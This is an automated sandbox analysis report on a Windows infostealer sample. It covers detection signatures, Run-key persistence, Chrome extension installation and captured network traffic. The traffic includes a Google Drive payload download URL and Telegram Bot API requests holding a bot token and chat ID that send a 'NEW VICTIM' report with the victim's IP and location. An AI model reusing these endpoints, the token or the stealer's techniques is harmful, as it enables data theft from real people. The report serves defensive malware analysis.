Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1573853
MD5:3567cb15156760b2f111512ffdbc1451
SHA1:2fdb1f235fc5a9a32477dab4220ece5fda1539d4
SHA256:0285d3a6c1ca2e3a993491c44e9cf2d33dbec0fb85fdbf48989a4e3b14b37630
Tags:exeuser-Bitsight
Infos:

Detection

Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Contains functionality to determine the online IP of the system
Creates files in the system32 config directory
Machine Learning detection for sample
Tries to harvest and steal browser information (history, passwords, etc)
Uses the Telegram API (likely for C&C communication)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to enumerate network shares
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates COM task schedule object (often to register a task for autostart)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Drops PE files
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Yara signature match

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 6660 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 3567CB15156760B2F111512FFDBC1451)
    • graph.exe (PID: 2892 cmdline: "C:\Program Files\Windows Media Player\graph\graph.exe" MD5: 7D254439AF7B1CAAA765420BEA7FBD3F)
  • file.exe (PID: 5576 cmdline: C:\Users\user\Desktop\file.exe MD5: 3567CB15156760B2F111512FFDBC1451)
    • graph.exe (PID: 7108 cmdline: "C:\Program Files\Windows Media Player\graph\graph.exe" MD5: 7D254439AF7B1CAAA765420BEA7FBD3F)
  • graph.exe (PID: 5068 cmdline: "C:\Program Files\Windows Media Player\graph\graph.exe" MD5: 7D254439AF7B1CAAA765420BEA7FBD3F)
  • graph.exe (PID: 5008 cmdline: "C:\Program Files\Windows Media Player\graph\graph.exe" MD5: 7D254439AF7B1CAAA765420BEA7FBD3F)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\output[1].pngINDICATOR_SUSPICIOUS_IMG_Embedded_ArchiveDetects images embedding archives. Observed in TheRat RAT.ditekSHen
  • 0x82f3:$zipwopass: 50 4B 03 04 14 00 00 00
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\output[1].pngINDICATOR_SUSPICIOUS_IMG_Embedded_ArchiveDetects images embedding archives. Observed in TheRat RAT.ditekSHen
  • 0x82f3:$zipwopass: 50 4B 03 04 14 00 00 00
C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fINDICATOR_SUSPICIOUS_IMG_Embedded_ArchiveDetects images embedding archives. Observed in TheRat RAT.ditekSHen
  • 0x82f3:$zipwopass: 50 4B 03 04 14 00 00 00

Sigma Signatures

System Summary

barindex
Sigma detected: CurrentVersion Autorun Keys Modification
Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Program Files\Windows Media Player\graph\graph.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\file.exe, ProcessId: 6660, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Graph

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for submitted file
Source: file.exeReversingLabs: Detection: 63%
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.7% probability
Machine Learning detection for sample
Source: file.exeJoe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exeDirectory created: C:\Program Files\Google\Chrome\ExtensionsJump to behavior
Source: C:\Users\user\Desktop\file.exeDirectory created: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fJump to behavior
Source: C:\Users\user\Desktop\file.exeDirectory created: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzipJump to behavior
Source: C:\Users\user\Desktop\file.exeDirectory created: C:\Program Files\Windows Media Player\graphJump to behavior
Source: C:\Users\user\Desktop\file.exeDirectory created: C:\Program Files\Windows Media Player\graph\graph.exeJump to behavior
Source: C:\Users\user\Desktop\file.exeDirectory created: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fJump to behavior
Source: C:\Users\user\Desktop\file.exeDirectory created: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzipJump to behavior
Source: unknownHTTPS traffic detected: 216.58.208.238:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknownHTTPS traffic detected: 216.58.208.238:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknownHTTPS traffic detected: 216.58.208.238:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.217.17.65:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.217.17.65:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.5:49710 version: TLS 1.2
Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49712 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.5:49719 version: TLS 1.2
Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49720 version: TLS 1.2
Source: file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: D:\exe\final\final\graph\x64\Release\graph.pdb% source: file.exe, 00000000.00000003.2261377843.000001E429283000.00000004.00000020.00020000.00000000.sdmp, graph.exe, 00000004.00000000.2261561392.00007FF67D719000.00000002.00000001.01000000.00000007.sdmp, graph.exe, 00000004.00000002.4001980452.00007FF67D719000.00000002.00000001.01000000.00000007.sdmp, graph.exe, 00000005.00000000.2285577697.00007FF67D719000.00000002.00000001.01000000.00000007.sdmp, graph.exe, 00000005.00000002.4001973279.00007FF67D719000.00000002.00000001.01000000.00000007.sdmp, graph.exe, 00000006.00000002.4001926398.00007FF67D719000.00000002.00000001.01000000.00000007.sdmp, graph.exe, 00000006.00000000.2357174678.00007FF67D719000.00000002.00000001.01000000.00000007.sdmp, graph.exe, 00000007.00000002.4001924174.00007FF67D719000.00000002.00000001.01000000.00000007.sdmp, graph.exe, 00000007.00000000.2437643141.00007FF67D719000.00000002.00000001.01000000.00000007.sdmp, graph.exe.0.dr
Source: Binary string: D:\exe\final\merged_final\x64\Release\fetcher2.pdb source: file.exe
Source: Binary string: D:\exe\final\merged_final\x64\Release\fetcher2.pdb[ source: file.exe
Source: Binary string: D:\exe\final\final\graph\x64\Release\graph.pdb source: file.exe, 00000000.00000003.2261377843.000001E429283000.00000004.00000020.00020000.00000000.sdmp, graph.exe, 00000004.00000000.2261561392.00007FF67D719000.00000002.00000001.01000000.00000007.sdmp, graph.exe, 00000004.00000002.4001980452.00007FF67D719000.00000002.00000001.01000000.00000007.sdmp, graph.exe, 00000005.00000000.2285577697.00007FF67D719000.00000002.00000001.01000000.00000007.sdmp, graph.exe, 00000005.00000002.4001973279.00007FF67D719000.00000002.00000001.01000000.00000007.sdmp, graph.exe, 00000006.00000002.4001926398.00007FF67D719000.00000002.00000001.01000000.00000007.sdmp, graph.exe, 00000006.00000000.2357174678.00007FF67D719000.00000002.00000001.01000000.00000007.sdmp, graph.exe, 00000007.00000002.4001924174.00007FF67D719000.00000002.00000001.01000000.00000007.sdmp, graph.exe, 00000007.00000000.2437643141.00007FF67D719000.00000002.00000001.01000000.00000007.sdmp, graph.exe.0.dr
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF72C9B8A90 NetUserEnum,WideCharToMultiByte,WideCharToMultiByte,NetApiBufferFree,_invalid_parameter_noinfo_noreturn,0_2_00007FF72C9B8A90
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32Jump to behavior
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServerJump to behavior
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ElevationJump to behavior
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32Jump to behavior
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServerJump to behavior
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ElevationJump to behavior
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF72C9B9B00 GetEnvironmentVariableW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,Concurrency::cancel_current_task,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF72C9B9B00
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF72C9EE3CC FindClose,FindFirstFileExW,GetLastError,0_2_00007FF72C9EE3CC
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF72C9EE440 GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,CloseHandle,CloseHandle,0_2_00007FF72C9EE440
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF72CA1070C FindFirstFileExW,0_2_00007FF72CA1070C
Source: C:\Program Files\Windows Media Player\graph\graph.exeCode function: 4_2_00007FF67D6FCD7C GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,CloseHandle,CloseHandle,4_2_00007FF67D6FCD7C
Source: C:\Program Files\Windows Media Player\graph\graph.exeCode function: 4_2_00007FF67D70FA54 FindFirstFileExW,4_2_00007FF67D70FA54
Source: C:\Program Files\Windows Media Player\graph\graph.exeCode function: 4_2_00007FF67D6FCD08 FindClose,FindFirstFileExW,GetLastError,4_2_00007FF67D6FCD08

Networking

barindex
Contains functionality to determine the online IP of the system
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF72C9C3CE0 InternetOpenA,InternetOpenUrlA,InternetCloseHandle,InternetReadFile,InternetReadFile,InternetCloseHandle,InternetCloseHandle,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn, IPInfoFetcher0_2_00007FF72C9C3CE0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF72C9C3CE0 InternetOpenA,InternetOpenUrlA,InternetCloseHandle,InternetReadFile,InternetReadFile,InternetCloseHandle,InternetCloseHandle,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn, https://ipinfo.io/json0_2_00007FF72C9C3CE0
Uses the Telegram API (likely for C&C communication)
Source: unknownDNS query: name: api.telegram.org
Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox ViewIP Address: 34.117.59.81 34.117.59.81
Source: Joe Sandbox ViewIP Address: 34.117.59.81 34.117.59.81
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknownDNS query: name: ipinfo.io
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF72C9C4D20 InternetOpenA,InternetOpenUrlA,InternetReadFile,InternetReadFile,InternetCloseHandle,InternetCloseHandle,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF72C9C4D20
Source: global trafficHTTP traffic detected: GET /uc?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download HTTP/1.1User-Agent: FileDownloaderHost: drive.google.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /uc?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download HTTP/1.1User-Agent: FileDownloaderHost: drive.google.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /download?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download HTTP/1.1User-Agent: FileDownloaderCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /download?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download HTTP/1.1User-Agent: FileDownloaderCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /json HTTP/1.1User-Agent: IPInfoFetcherHost: ipinfo.ioCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /bot7855878545:AAEEMUvgpX9jTAxlDd2gM_Sbv2jbI6-5_0o/sendMessage?chat_id=7427009775&text=%3Cb%3E%F0%9F%94%94NEW%20VICTIM%20%2D%20Extensions%20Installed%3C%2Fb%3E%0A%3Cb%3EIP%20Address%3A%3C%2Fb%3E%208%2E46%2E123%2E189%0A%3Cb%3EDevice%20Name%3A%3C%2Fb%3E%20648351%0A%3Cb%3ELocation%3A%3C%2Fb%3E%20New%20York%20City%2C%20New%20York%2C%20US%0A%3Cb%3EWallets%3A%3C%2Fb%3E%0A%3Ccode%3ENothing%20found%3C%2Fcode%3E&parse_mode=HTML HTTP/1.1User-Agent: TelegramBotHost: api.telegram.orgCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /json HTTP/1.1User-Agent: IPInfoFetcherHost: ipinfo.ioCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /bot7855878545:AAEEMUvgpX9jTAxlDd2gM_Sbv2jbI6-5_0o/sendMessage?chat_id=7427009775&text=%3Cb%3E%F0%9F%94%94NEW%20VICTIM%20%2D%20Extensions%20Installed%3C%2Fb%3E%0A%3Cb%3EIP%20Address%3A%3C%2Fb%3E%208%2E46%2E123%2E189%0A%3Cb%3EDevice%20Name%3A%3C%2Fb%3E%20648351%0A%3Cb%3ELocation%3A%3C%2Fb%3E%20New%20York%20City%2C%20New%20York%2C%20US%0A%3Cb%3EWallets%3A%3C%2Fb%3E%0A%3Ccode%3ENothing%20found%3C%2Fcode%3E&parse_mode=HTML HTTP/1.1User-Agent: TelegramBotHost: api.telegram.orgCache-Control: no-cache
Source: global trafficDNS traffic detected: DNS query: drive.google.com
Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
Source: global trafficDNS traffic detected: DNS query: ipinfo.io
Source: global trafficDNS traffic detected: DNS query: api.telegram.org
Source: file.exe, 00000000.00000002.2302798915.000001E429270000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2204001116.000001E429277000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2285423182.0000020705E28000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000002.2326755680.0000020705E20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://microsoft.co
Source: file.exe, 00000000.00000003.2173707473.000001E427632000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.micro
Source: file.exe, 00000002.00000002.2326412111.00000207054F7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000002.2326412111.0000020705452000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/
Source: file.exeString found in binary or memory: https://api.telegram.org/bot
Source: file.exe, 00000002.00000002.2326412111.0000020705523000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000002.2326412111.0000020705518000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7855878545:AAEEMUvgpX9jTAxlDd2gM_Sbv2jbI6-5_0o/sendMessage?chat_id=74270
Source: file.exeString found in binary or memory: https://api.telegram.org/botFailed
Source: file.exe, 00000002.00000002.2326412111.0000020705452000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/f
Source: file.exe, 00000002.00000002.2326412111.00000207054F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/r
Source: file.exe, 00000000.00000003.2173707473.000001E427632000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chrome.g
Source: file.exe, 00000000.00000003.2173694588.000001E427643000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172827178.000001E42763D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172934833.000001E427642000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172766809.000001E427637000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chrome.goo
Source: file.exe, 00000002.00000003.2183162434.000002070547E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/websto
Source: file.exe, 00000002.00000003.2183040955.0000020705485000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore
Source: file.exe, 00000000.00000003.2175064933.000001E427676000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2174902630.000001E427674000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore$
Source: file.exe, 00000002.00000003.2183332180.0000020705481000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2183162434.000002070547E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000002.2326412111.0000020705452000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstoreh
Source: file.exe, 00000002.00000003.2183250126.000002070549B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2183222413.0000020705493000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2183071483.0000020705494000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2183142779.000002070548A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2183291487.000002070549F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstores
Source: file.exe, 00000002.00000003.2183250126.000002070549B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2183222413.0000020705493000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2183071483.0000020705494000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2183142779.000002070548A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2183291487.000002070549F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstorev
Source: file.exe, 00000002.00000003.2182984321.0000020705493000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2183040955.0000020705485000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crx
Source: file.exe, 00000000.00000003.2174782172.000001E42764C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172846719.000001E427647000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172827178.000001E42763D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172974912.000001E42764B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crxB
Source: file.exe, 00000002.00000003.2183250126.000002070549B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2183222413.0000020705493000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000002.2326412111.0000020705452000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2183142779.000002070548A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2183291487.000002070549F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2285253534.000002070549B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crxG&~
Source: file.exe, 00000000.00000003.2172846719.000001E427647000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172827178.000001E42763D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172974912.000001E42764B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crxj
Source: file.exe, 00000002.00000003.2183332180.0000020705481000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.2183162434.000002070547E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crxtinZ
Source: file.exe, 00000002.00000003.2183040955.0000020705485000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/
Source: file.exe, 00000002.00000003.2183040955.0000020705485000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive-autopush.corp.google.com/
Source: file.exe, 00000002.00000003.2183040955.0000020705485000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-0.corp.google.com/
Source: file.exe, 00000000.00000003.2173694588.000001E427643000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2302541318.000001E42763D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172827178.000001E42763D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2174782172.000001E427645000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172934833.000001E427642000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2174933443.000001E427645000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-1.corp.google.com
